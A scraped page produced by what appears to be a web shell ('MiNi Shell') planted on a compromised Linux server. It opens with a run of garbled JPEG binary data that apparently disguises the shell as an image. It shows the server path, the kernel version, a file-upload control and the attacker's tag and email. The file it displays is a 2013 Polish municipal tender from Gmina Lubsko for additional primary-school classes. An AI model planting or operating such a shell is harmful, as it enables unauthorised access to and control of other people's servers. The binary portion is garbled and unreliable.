JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131015/419306-N-2013.html

<p class="kh_header"><b>Lubsko: Indywidualizacja nauczania i wychowywania
uczniów klas I-III w Szkołach Podstawowych w Gminie Lubsko - Zajęcia</b><br>
<b>Numer ogłoszenia: 419306 - 2013; data zamieszczenia: 15.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubsko , Plac Wolności 1, 68-300 Lubsko, woj. lubuskie, tel. 068 4576108, faks 068 4576200, 4576222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja nauczania i wychowywania
uczniów klas I-III w Szkołach Podstawowych w Gminie Lubsko - Zajęcia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Lubsko w ramach projektu (Indywidualizacja nauczania i wychowywania uczniów klas I - III w szkołach podstawowych w Gminie Lubsko) finansowanego z Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki.

2. Zakres, ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania  stanowiące części zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 60 minut zajęć specjalistycznych, natomiast w przypadku pozostałych zajęć rozwijających uzdolnienia i zajęć dydaktyczno-wyrównawczych -  45 minut nieprzerwanej pracy. Przedmiot zamówienia obejmuje następujące części w czterech szkołach podstawowych:

Część 1 - Szkoła Podstawowa Nr 1 w Lubsku
Zadanie 1
Zajęcia dla pięcioosobowej grupy uczniów ze specyficznymi trudnościami w czytaniu
i pisaniu, w tym także zagrożonych ryzykiem dysleksji - w wymiarze 30 h na każdego
ucznia w grupie (3 grupy - razem 90 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 2
Zajęcia dla pięcioosobowej grupy uczniów z trudnościami w zdobywaniu umiejętności matematycznych - w wymiarze 30 h na każdego ucznia w grupie (3 grupy - razem 90 h) , w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 3
Zajęcia logopedyczne dla czteroosobowej grupy uczniów z zaburzeniami rozwoju mowy -
w wymiarze 30 h na każdego ucznia w grupie (3 grupy - razem 90 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 4
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej dla pięcioosobowej grupy uczniów z zaburzeniami rozwoju mowy -
w wymiarze 30 h na każdego ucznia w grupie (3 grupy - razem 90 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 5
Gimnastyka korekcyjna dla pięcioosobowej grupy uczniów z wadami postawy - w wymiarze 30 h na każdego ucznia w grupie (3 grup - razem 90h) oraz gimnastyka korekcyjna z elementami nauki pływania w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h) , w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 6
Zajęcia specjalistyczne terapeutyczne  dla pięcioosobowej grupy uczniów biblioterapii - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 7
Zajęcia specjalistyczne terapeutyczne  dla pięcioosobowej grupy uczniów zajęcia korekcyjno-kompensacyjne  - w wymiarze 30 h na każdego ucznia w grupie (3 grupy - razem 90h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 8
Zajęcia rozwijające zainteresowania dla pięcioosobowej grupy uczniów:
1)	Kółko matematyczno-przyrodnicze - w wymiarze 30 h na każdego ucznia w grupie (3grupy - razem 90h), w okresie od października 2013 r. do czerwca 2014 r. 
2)	Kółko polonistyczne - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 
3)	Kółko języka niemieckiego - w wymiarze 30 h na każdego ucznia w grupie (1 grupa - razem 30h), w okresie od października 2013 r. do czerwca 2014 r. 
4)	Kółko języka angielskiego - w wymiarze 30 h na każdego ucznia w grupie (1 grupa - razem 30h), w okresie od października 2013 r. do czerwca 2014 r. 
5)	Kółko artystyczne - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 


Część 2 - Szkoła Podstawowa Nr 2 w Lubsku

Zadanie 9
Zajęcia dla pięcioosobowej grupy uczniów ze specyficznymi trudnościami w czytaniu
i pisaniu, w tym także zagrożonych ryzykiem dysleksji - w wymiarze 30 h na każdego
ucznia w grupie (3 grupy - razem 90 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 10
Zajęcia dla pięcioosobowej grupy uczniów z trudnościami w zdobywaniu umiejętności matematycznych - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60 h) , w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 11
Zajęcia logopedyczne dla czteroosobowej grupy uczniów z zaburzeniami rozwoju mowy -
w wymiarze 30 h na każdego ucznia w grupie (4 grupy - razem 120 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 12
Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej dla ośmioosobowej grupy uczniów z elementami socjoterapii -
w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 13
Gimnastyka korekcyjna dla pięcioosobowej grupy uczniów z wadami postawy - w wymiarze 30 h na każdego ucznia w grupie (5 grup - razem 150h) , w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 14
Zajęcia specjalistyczne terapeutyczne  dla pięcioosobowej grupy uczniów biblioterapii - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 15
Zajęcia specjalistyczne terapeutyczne  dla pięcioosobowej grupy uczniów zajęcia korekcyjno-kompensacyjne  - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 16
Zajęcia rozwijające zainteresowania 
- dla siedmioosobowej grupy uczniów:
1)	Kółko przyrodnicze (Mali odkrywcy) - w wymiarze 30 h na każdego ucznia w grupie (2grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 

- dla ośmioosobowej grupy uczniów:
2)	Kółko matematyczne (Nasz Kangurek) - w wymiarze 30 h na każdego ucznia w grupie (2 grupy - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 
3)	Kółko (Tworzę różne wypowiedzi pisemne) - w wymiarze 30 h na każdego ucznia w grupie (1 grupa - razem 30h), w okresie od października 2013 r. do czerwca 2014 r. 
4)	Kółko (Ortografek) - w wymiarze 30 h na każdego ucznia w grupie (1 grupa - razem 30h), w okresie od października 2013 r. do czerwca 2014 r. 
5)	Kółko (Mali ratownicy) - w wymiarze 30 h na każdego ucznia w grupie (1 grupa - razem 30h), w okresie od października 2013 r. do czerwca 2014 r. 

Część 3 - Szkoła Podstawowa Nr 3 w Lubsku

Zadanie 17
Zajęcia dla sześcioosobowej grupy uczniów ze specyficznymi trudnościami w czytaniu
i pisaniu, w tym także zagrożonych ryzykiem dysleksji - w wymiarze 40 h na każdego
ucznia w grupie (2 grupy - razem 80 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 18
Zajęcia dla sześcioosobowej grupy uczniów z trudnościami w zdobywaniu umiejętności matematycznych - w wymiarze 40 h na każdego ucznia w grupie (2 grupy - razem 80 h) , w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 19
Zajęcia logopedyczne dla czteroosobowej grupy uczniów z zaburzeniami rozwoju mowy -
w wymiarze 40 h na każdego ucznia w grupie (2 grupy - razem 80 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 20
Gimnastyka korekcyjna dla ośmioosobowej grupy uczniów z wadami postawy - w wymiarze 40 h na każdego ucznia w grupie (2 grup - razem 80 h) , w okresie od października 2013 r. do czerwca 2014 r. 


Zadanie 21
Zajęcia rozwijające zainteresowania  dla pięcioosobowej grupy uczniów - Kółko matematyczno-przyrodnicze (Klub małego odkrywcy) - w wymiarze 40 h na każdego ucznia w grupie (2 grupy - razem 80h), w okresie od października 2013 r. do czerwca 2014 r. 

Część 4 - Szkoła Podstawowa  w Górzynie (Gmina Lubsko)

Zadanie 22
Zajęcia dla pięcioosobowej grupy uczniów ze specyficznymi trudnościami w czytaniu
i pisaniu, w tym także zagrożonych ryzykiem dysleksji - w wymiarze 30 h na każdego
ucznia w grupie (1 grupa - razem 60 h), w okresie od października 2013 r. do czerwca 2014 r. 

Zadanie 23
Zajęcia logopedyczne dla czteroosobowej grupy uczniów z zaburzeniami rozwoju mowy -
w wymiarze 60 h na każdego ucznia w grupie (1 grupa - razem 60 h), w okresie od października 2013 r. do czerwca 2014 r. 


Zadanie 24
Zajęcia rozwijające zainteresowania dla sześcioosobowej grupy uczniów:
1)	Kółko matematyczno-przyrodnicze  - w wymiarze 60 h na każdego ucznia w grupie (1grupa - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 
2)	Kółko polonistyczne - w wymiarze 60 h na każdego ucznia w grupie (1 grupa - razem 60h), w okresie od października 2013 r. do czerwca 2014 r. 

3. Razem we wszystkich szkołach zostanie zrealizowanych 2380 h dodatkowych zajęć w tym:
- 320 h zajęć  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji;
- 350 h zajęć logopedycznych;
- 230 h zajęć matematycznych;
- 150 h zajęć socjoterapeutycznych i psychoedukacyjnych;
- 270 h specjalistycznych zajęć terapeutycznych;
- 380 h gimnastyki korekcyjnej;
- 680 h zajęć rozwijających umiejętności..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający, zgodnie z art. 67, ust. 1. pkt 6) ustawy Pzp przewiduje zamówienia uzupełniające w kwocie nieprzekraczającej  20%  wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań co do spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań co do spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań co do spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniającego warunek dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawcę, który (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne kwalifikacje i doświadczenie):
Osoby, które będą uczestniczyć w wykonaniu zamówienia, tj. prowadzić zajęcia, muszą posiadać kwalifikacje do nauczania w klasach I - III szkół podstawowych zgodne z rozporządzeniem, o którym mowa w pkt 1.1 b) oraz minimum 1 rok  doświadczenia w nauczaniu dzieci szkół podstawowych.
Dla osób które będą prowadzić zajęcia Wykonawca załączy oświadczenie, że osoby te posiadają dyplom ukończenia:
a) studiów magisterskich na kierunku (specjalności) zgodnym z nauczanym przedmiotem lub prowadzonymi zajęciami wraz z przygotowaniem pedagogicznym lub 
b) studiów magisterskich na kierunku, którego zakres określony w standardzie kształcenia dla tego kierunku studiów w grupie treści podstawowych i kierunkowych obejmuje treści nauczanego przedmiotu lub prowadzonych zajęć wraz z przygotowaniem pedagogicznym lub
c) studiów magisterskich na kierunku (specjalności) innym niż wymieniony w punkcie a) i b) i studiów podyplomowych w zakresie nauczanego przedmiotu lub prowadzonych zajęć wraz z przygotowaniem pedagogicznym 
lub
d) zakładu kształcenia nauczycieli w specjalności odpowiadającej nauczanemu przedmiotowi lub prowadzonym zajęciom, 
lub
e) zakładu kształcenia nauczycieli w specjalności innej niż wymieniona w punkcie d), a ponadto ukończyła kurs kwalifikacyjny w zakresie nauczanego przedmiotu lub prowadzonych zajęć.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowych wymagań co do spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie będą mogły nastąpić w następujących przypadkach:

1.  aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy,
        zmianę adresu siedziby, zmianę formy prawnej itp.,
2. zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy
       lub Zamawiającego, które to przyczyny każda ze Stron musi udokumentować, pod
       warunkiem, że takiej zgody udzieli instytucja finansująca i że Zamawiający nie straci
      dofinansowania,
3. jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie
        mającym wpływ na realizację przedmiotu zamówienia,
4. ze względu na dofinansowanie zadania możliwa jest zmiana umowy w zakresie
       dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie,
5. zmiany harmonogramu realizacji zamówienia.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający               
     może wyrazić zgodę; nie stanowią one zobowiązania dla Zamawiającego do   
     udzielenia takiej zgody.

Pozostałe kwestie odnoszące się do umowy uregulowane są w Części II niniejszej SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lubsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lubsku, ul. powstańców Wlkp. 3, 68-300 Lubsko, pokój nr 41, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2013 godzina 10:00, miejsce: Urząd Miejski w Lubsku, pl. Wolności 1, 68-300 Lubsko, parter - Punkt obsługi interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  Indywidualizacja nauczania i wychowywania uczniów klas I-III szkól podstawowych w Gminie Lubsko -
współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego 
w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com